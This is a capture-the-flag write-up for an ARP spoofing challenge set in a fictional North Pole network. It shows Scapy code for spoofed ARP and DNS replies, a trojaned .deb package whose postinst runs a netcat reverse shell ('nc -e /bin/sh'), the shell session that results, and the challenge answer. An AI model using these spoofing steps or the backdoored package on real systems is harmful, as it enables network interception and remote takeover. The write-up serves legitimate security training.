Skip to content

Objective #9 - ARP Shenanigans

Objective

Go to the NetWars room on the roof and help Alabaster Snowball get access back to a host using ARP. Retrieve the document at /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt. Who recused herself from the vote described on the document?

Tip

If you need help, read the HELP.md file in the terminal for additional hints.

Solution

Step 1: Capture some packets and notice that there are unanswered ARP requests coming from the remote host.

$ tshark  -ni eth0
Capturing on 'eth0'
    1 0.000000000 4c:24:57:ab:ed:84 → ff:ff:ff:ff:ff:ff ARP 42 Who has 10.6.6.53? Tell 10.6.6.35

Step 2: Modify arp_rest.py to create a spoofed reply to the ARP request. The following lines need to be modified in the script.

ether_resp = Ether(dst="4c:24:57:ab:ed:84", type=0x806, src="02:42:0a:06:00:02")

arp_response = ARP(pdst="4c:24:57:ab:ed:84")
arp_response.op = 2
arp_response.plen = 4
arp_response.hwlen = 6
arp_response.ptype = 0x0800
arp_response.hwtype = 1

arp_response.hwsrc = "02:42:0a:06:00:02"
arp_response.psrc = "10.6.6.53"
arp_response.hwdst = "4c:24:57:ab:ed:84"
arp_response.pdst = "10.6.6.35"

Note

Your terminal may use slightly different values for IP address and MAC address. Be sure to check the output of ifconfig to see what values to use for the local host.

Step 3: Observe the DNS request once the ARP reply is correct.

$ tshark  -ni eth0
Capturing on 'eth0'
   9 8.295979549 4c:24:57:ab:ed:84 → ff:ff:ff:ff:ff:ff ARP 42 Who has 10.6.6.53? Tell 10.6.6.35
   10 8.320179378 02:42:0a:06:00:03 → 4c:24:57:ab:ed:84 ARP 42 10.6.6.53 is at 02:42:0a:06:00:03
   11 8.336321657    10.6.6.35 → 10.6.6.53    DNS 74 Standard query 0x0000 A ftp.osuosl.org

Step 4: Modify dns_resp.py to create a spoofed reply to the DNS request. The following lines need to be modified in the script. When you run this, you’ll see in the tshark output that a request is being made to port 80 on your host.

ipaddr_we_arp_spoofed = "10.6.6.53"

def handle_dns_request(packet):
    eth = Ether(src="02:42:0a:06:00:02", dst="4c:24:57:ab:ed:84")
    ip  = IP(dst="10.6.6.35", src="10.6.6.53") 
    udp = UDP(dport=packet[UDP].sport, sport=53)
    dns = DNS(
        id=packet[DNS].id, qd=packet[DNS].qd, aa=1, qr=1, an=DNSRR(rrname=packet[DNS].qd.qname, ttl=10, rdata=ipaddr)

Step 5: Set up an http listener to answer the port 80 connection. You'll see that the client is requesting a .deb file. 

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …
10.6.6.35 - - [14/Dec/2020 03:14:41] code 404, message File not found
10.6.6.35 - - [14/Dec/2020 03:14:41] "GET /pub/jfrost/backdoor/suriv_amd64.deb HTTP/1.1" 404 -

Step 6: Create a deb file to exploit the remote host. A .deb file is a debian software package. A post-installation script can be embedded in the file to run commands necessary to complete the package setup. You'll find a netcat deb package in the debs folder on the terminal. You can rename this to the deb package being requested by the remote host, and modify it to run a netcat command after it is installed.

fakeroot sh -c '
   mkdir tmp
   dpkg-deb -R debs/netcat-traditional_1.10–41.1ubuntu1_amd64.deb tmp
   echo "nc -e /bin/sh 10.6.0.2 5678" >> tmp/DEBIAN/postinst
   dpkg-deb -b tmp fixed.deb
'

Info

fakeroot runs a command in an environment where it appears to have root privileges for file manipulation. This is useful for allowing users to create archives (tar, ar, .deb etc.) with files in them with root permissions/ownership. -From https://wiki.debian.org/FakeRoot

Step 7: Put it all together

Tmux pane #1 contains the DNS spoof responder and the HTTP listener.

$ mkdir -p http/pub/jfrost/backdoor
$ mv fixed.deb http/pub/jfrost/backdoor/suriv_amd64.deb
$ scripts/dns_resp.py && python3 -m http.server 80 --directory http/

TMUX pane #3 contains the netcat listener to catch the reverse shell.

$ nc -nlvp 5678

Tmux pane #2 contains the ARP spoof responder.

$ scripts/arp_resp.py

Step 8: When the reverse shell is established, view the target file.

$ nc -nlvp 5678
listening on [any] 5678
connect to [10.6.0.2] from (UNKNOWN) [10.6.6.35] 35976
id
uid=1500(jfrost) gid=1500(jfrost) groups=1500(jfrost)
cat /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt
NORTH POLE
LAND USE BOARD
MEETING MINUTES

January 20, 2020

Meeting Location: All gathered in North Pole Municipal Building, 1 Santa Claus Ln, North Pole

Chairman Frost calls meeting to order at 7:30 PM North Pole Standard Time.

Roll call of Board members please:
Chairman Jack Frost - Present
Vice Chairman Mother Nature - Present

Superman - Present
Clarice - Present
Yukon Cornelius - HERE!
Ginger Breaddie - Present
King Moonracer - Present
Mrs. Donner - Present
Tanta Kringle - Present
Charlie In-the-Box - Here
Krampus - Growl
Dolly - Present
Snow Miser - Heya!
Alabaster Snowball - Hello
Queen of the Winter Spirits - Present

ALSO PRESENT:
                Kris Kringle
                Pepper Minstix
                Heat Miser
                Father Time

Chairman Frost made the required announcement concerning the Open Public Meetings Act: 
Adequate notice of this meeting has been made -- displayed on the bulletin board next to the 
Pole, listed on the North Pole community website, and published in the North Pole Times 
newspaper -- for people who are interested in this meeting.

Review minutes for December 2020 meeting. Motion to accept – Mrs. Donner. Second – Superman.  
Minutes approved.

OLD BUSINESS: No Old Business.

RESOLUTIONS:
The board took up final discussions of the plans presented last year for the expansion of 
Santa’s Castle to include new courtyard, additional floors, elevator, roughly tripling the 
size of the current castle.  Architect Ms. Pepper reviewed the planned changes and 
engineering reports. Chairman Frost noted, “These changes will put a heavy toll on the 
infrastructure of the North Pole.”  Mr. Krampus replied, “The infrastructure has already been 
expanded to handle it quite easily.”  Chairman Frost then noted, “But the additional traffic 
will be a burden on local residents.”  Dolly explained traffic projections were all in 
alignment with existing roadways.  Chairman Frost then exclaimed, “But with all the attention 
focused on Santa and his castle, how will people ever come to refer to the North Pole as ‘The 
Frostiest Place on Earth?’”  Mr. In-the-Box pointed out that new tourist-friendly taglines 
are always under consideration by the North Pole Chamber of Commerce, and are not a matter 
for this Board.  Mrs. Nature made a motion to approve.  Seconded by Mr. Cornelius.  Tanta 
Kringle recused herself from the vote given her adoption of Kris Kringle as a son early in 
his life.  

Approved:
Mother Nature
Superman
Clarice
Yukon Cornelius
Ginger Breaddie
King Moonracer
Mrs. Donner
Charlie In the Box
Krampus
Dolly
Snow Miser
Alabaster Snowball
Queen of the Winter Spirits

Opposed: 
                Jack Frost

Resolution carries.  Construction approved.

NEW BUSINESS:

Father Time Castle, new oversized furnace to be installed by Heat Miser Furnace, Inc.  Mr. H. 
Miser described the plan for installing new furnace to replace the faltering one in Mr. 
Time’s 20,000 sq ft castle. Ms. G. Breaddie pointed out that the proposed new furnace is 
900,000,000 BTUs, a figure she considers “incredibly high for a building that size, likely 
two orders of magnitude too high.  Why, it might burn the whole North Pole down!”  Mr. H. 
Miser replied with a laugh, “That’s the whole point!”  The board voted unanimously to reject 
the initial proposal, recommending that Mr. Miser devise a more realistic and safe plan for 
Mr. Time’s castle heating system.


Motion to adjourn – So moved, Krampus.  Second – Clarice. All in favor – aye. None opposed, 
although Chairman Frost made another note of his strong disagreement with the approval of the 
Kringle Castle expansion plan.  Meeting adjourned.

Answer: Tanta Kringle